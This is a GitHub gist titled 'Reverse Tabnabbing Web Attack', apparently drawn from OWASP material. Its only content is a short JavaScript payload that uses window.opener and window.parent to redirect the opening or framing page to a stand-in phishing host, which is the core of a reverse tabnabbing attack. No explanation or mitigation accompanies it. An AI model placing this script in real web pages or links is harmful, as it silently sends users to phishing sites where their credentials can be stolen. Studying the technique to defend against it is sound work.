Skip to content

Instantly share code, notes, and snippets.

@devhug
Created August 10, 2021 19:09
Reverse Tabnabbing Web Attack | OWASP Foundation
<script>
if (window.opener) window.opener.parent.location.replace('http://phishing.com');
if (window.parent != window) window.parent.location.replace('http://phishing.com');
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment